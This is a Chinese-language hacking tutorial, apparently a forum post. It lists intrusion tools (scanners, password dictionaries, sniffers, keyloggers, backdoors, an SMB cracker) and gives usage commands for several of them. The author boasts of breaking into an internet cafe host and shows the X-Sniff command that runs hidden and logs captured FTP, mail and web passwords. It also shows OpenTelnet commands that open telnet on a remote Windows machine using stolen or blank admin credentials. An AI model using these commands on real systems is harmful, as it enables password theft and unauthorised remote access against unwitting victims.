扫描类 流光、X-way、SuperScan、X-Scan
生成字典类 黑客字典、字典专家、超级字典生成器、生日密码生成器
嗅探监听类 X-Sniff、Winsniff、ARp-Killer、ARPSniffer、MyNetmon、NetXray
键盘纪录类 广外幽灵、血火
代理和跳板类 代理猎手 Snake
后门类 Hall、hacktelnet、BackDoor、Rmistaller、 winshell、蓝火
Win2000/NT密码破解类 SMBCrack
扫描类的就没什么讲的了都是有用户界面的。只要输入对方的ip进行扫描就行了。
生成字典类也比较简单也有界面,他会要你选择用什么生成字典是纯数字呢?还是字母等等。
嗅探类的我挑X-Sniff来说:X-Sniff可捕获局域网内FTP/SMTP/POP3/HTTP协议密码。运行参数说明:
xsniff <选项> <选项>含义如下:
-tcp : 输出TCP数据报 -udp : 输出UDP数据报
-icmp : 输出ICMP数据报 -pass : 过滤密码信息
-hide : 后台运行 -host : 解析主机名
-addr : 过滤IP地址 -port <端口> : 过滤端口
-log <文件名> : 将输出保存到文件 -asc : 以ASCII形式输出
-hex : 以16进制形式输出比如:我入侵了xx网吧的Host(这时已经telnet上去了,哈哈!爽啊~~HOHOHO!),
输入:c:\xsniff.exe -hide -pass -log c:\winnt\pass.log这句话的意思是监听所有通过这台主机的密码(哈哈!比不
一会什么邮箱账号,游戏账号一大把啊)。并把截获到的密码放在c:\winnt目录下的password文件中!键盘纪录的我比较
喜欢用广外幽灵,他操作简单只要现在要纪录键盘的文件就行了。代理的代理猎手是进行大面积的扫描代理只要输入IP范
围就ok了!
后门类的我说说hacktelnet他有2个文件分别是OpenTelnet,ResumeTelnet。OpenTelnet是用来打开对方的telnet
只有知道了对方的用户名和密码还有存在空连接就可以这样使用:OpenTelnet.exe \\IP <帐号> <密码> :0: 不使用
NTLM 身份验证。1: 先尝试 NTLM 身份验证。如果失败,再使用用户名和密码。2: 只使用 NTLM 身份验证。 (假设IP
为192.168.1.1,用户名为admin,密码是:123456)c:\opentelnet \\192.168.1.1 admin 123456 1 9000这样我们就可
以:c:\telnet 192.168.1.1 9000如果对方的密码为空可以这样:c:\opentelnet \\192.168.1.1 admin "" 1 9000另外
那个ResumeTelnet是用来恢复Telnet配置的,并关闭Telnet服务器,它的用法:ResumeTelnet.exe \\ip <帐号> <密码>
例如:c:\resumetelnet \\192.168.1.1 admin 123456这下就可以了!另外附带一下hall和蓝火的帮助文件。感兴趣的
可以看看。
